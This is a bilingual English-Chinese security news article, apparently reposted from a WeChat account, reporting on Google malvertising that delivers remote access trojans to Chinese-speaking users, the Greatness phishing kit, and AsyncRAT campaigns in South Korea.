Google上针对中国用户的恶意广告活动，涉及Telegram

Chinese-speaking users have been targeted by malicious Google ads for restricted messaging apps like Telegram as part of an ongoing malvertising campaign.

针对中文用户的恶意谷歌广告针对限制性消息应用程序，如Telegram，作为持续的恶意广告活动的一部分。

"The threat actor is abusing Google advertiser accounts to create malicious ads and pointing them to pages where unsuspecting users will download Remote Administration Trojan (RATs) instead," Malwarebytes' Jérôme Segura said in a Thursday report. "Such programs give an attacker full control of a victim's machine and the ability to drop additional malware."

“威胁行为者滥用谷歌广告账户创建恶意广告，并将它们指向页面，其中毫不知情的用户将下载远程管理特洛伊木马（RATs），” Malwarebytes的Jérôme Segura在周四的报告中说。"这类程序给攻击者对受害者机器的完全控制和投放其他恶意软件的能力。"

It's worth noting that the activity, codenamed FakeAPP, is a continuation of a prior attack wave that targeted Hong Kong users searching for messaging apps like WhatsApp and Telegram on search engines in late October 2023.

值得注意的是，代号为FakeAPP的活动是对2023年10月底在搜索引擎上搜索WhatsApp和Telegram等消息应用程序的香港用户发起的一波先前攻击的延续。

The latest iteration of the campaign also adds messaging app LINE to the list of messaging apps, redirecting users to bogus websites hosted on Google Docs or Google Sites.

该活动的最新版本还将消息应用LINE添加到消息应用列表中，将用户重定向到托管在Google Docs或Google Sites上的虚假网站。

The Google infrastructure is used to embed links to other sites under the threat actor's control in order to deliver the malicious installer files that ultimately deploy trojans such as PlugX and Gh0st RAT.

谷歌基础设施被用于嵌入到威胁行为者控制下的其他站点的链接，以传递恶意的安装程序文件，最终部署像PlugX和Gh0st RAT等特洛伊木马。

Malwarebytes said it traced the fraudulent ads to two advertiser accounts named Interactive Communication Team Limited and Ringier Media Nigeria Limited that are based in Nigeria.

Malwarebytes表示，他们将这些欺诈广告追溯到两个名为Interactive Communication Team Limited和Ringier Media Nigeria Limited的广告主账户，这两个账户位于尼日利亚。

"It also appears that the threat actor privileges quantity over quality by constantly pushing new payloads and infrastructure as command-and-control," Segura said.

“看起来威胁行为者更注重数量而不是质量，不断推送新的载荷和基础设施作为命令和控制，” Segura说。

The development comes as Trustwave SpiderLabs disclosed a spike in the use of a phishing-as-a-service (PhaaS) platform called Greatness to create legitimate-looking credential harvesting pages targeting Microsoft 365 users.

Trustwave SpiderLabs透露，有一个名为Greatness的网络钓鱼平台的使用量激增，该平台可创建针对Microsoft 365用户的看似合法的凭证窃取页面。

"The kit allows for personalizing sender names, email addresses, subjects, messages, attachments, and QR codes, enhancing relevance and engagement," the company said, adding it comes with anti-detection measures like randomizing headers, encoding, and obfuscation aim to bypass spam filters and security systems.

“该工具允许个性化发件人姓名，电子邮件地址，主题，消息，附件和QR代码，提高相关性和参与度，”公司说，并补充说它带有抗检测措施，如随机化标题，编码和混淆，旨在绕过垃圾邮件过滤器和安全系统。

Greatness is offered for sale to other criminal actors for $120 per month, effectively lowering the barrier to entry and helping them conduct attacks at scale.

Greatness以每月120美元的价格出售给其他犯罪分子，有效降低了准入门槛，并帮助他们规模化进行攻击。

Attack chains entail sending phishing emails bearing malicious HTML attachments that, when opened by the recipients, direct them to a fake login page that captures the login credentials entered and exfiltrates the details to the threat actor via Telegram.

攻击链包括发送带有恶意HTML附件的网络钓鱼电子邮件，当接收者打开时，将其引导到一个虚假的登录页面，捕获输入的登录凭据并通过Telegram将详细信息泄露给威胁行为者。

Other infection sequences have leveraged the attachments to drop malware on the victim's machine to facilitate information theft.

其他感染序列利用附件在受害者的机器上释放恶意软件，以促进信息窃取。

To increase the likelihood of success of the attack, the email messages spoof trusted sources like banks and employers and induce a false sense of urgency using subjects like "urgent invoice payments" or "urgent account verification required."

为增加攻击成功的可能性，电子邮件消息伪装成信任的来源，如银行和雇主，并通过"紧急发票支付"或"紧急账户验证要求"等主题诱导虚假的紧急感。

"The number of victims is unknown at this time, but Greatness is widely used and well-supported, with its own Telegram community providing information on how to operate the kit, along with additional tips and tricks," Trustwave said.

“目前受害者数量未知，但Greatness被广泛使用并得到良好支持，其拥有自己的Telegram社区，提供有关如何操作该工具的信息，以及其他提示和技巧，” Trustwave表示。

Phishing attacks have also been observed striking South Korean companies using lures that impersonate tech companies like Kakao to distribute AsyncRAT via malicious Windows shortcut (LNK) files.

观察到网络钓鱼攻击还打击了以冒充Kakao等科技公司为诱饵，通过恶意Windows快捷方式（LNK）文件分发AsyncRAT的韩国公司。

"Malicious shortcut files disguised as legitimate documents are continuously being distributed," the AhnLab Security Intelligence Center (ASEC) said. "Users can mistake the shortcut file for a normal document, as the '.LNK' extension is not visible on the names of the files."

“恶意的快捷方式文件伪装成合法文档不断被分发，"AhnLab Security Intelligence Center（ASEC）表示。"用户可能会将快捷方式文件误认为是正常文档，因为文件名上看不到'.LNK'扩展名。

原文始发于微信公众号（知机安全）：Google上针对中国用户的恶意广告活动，涉及Telegram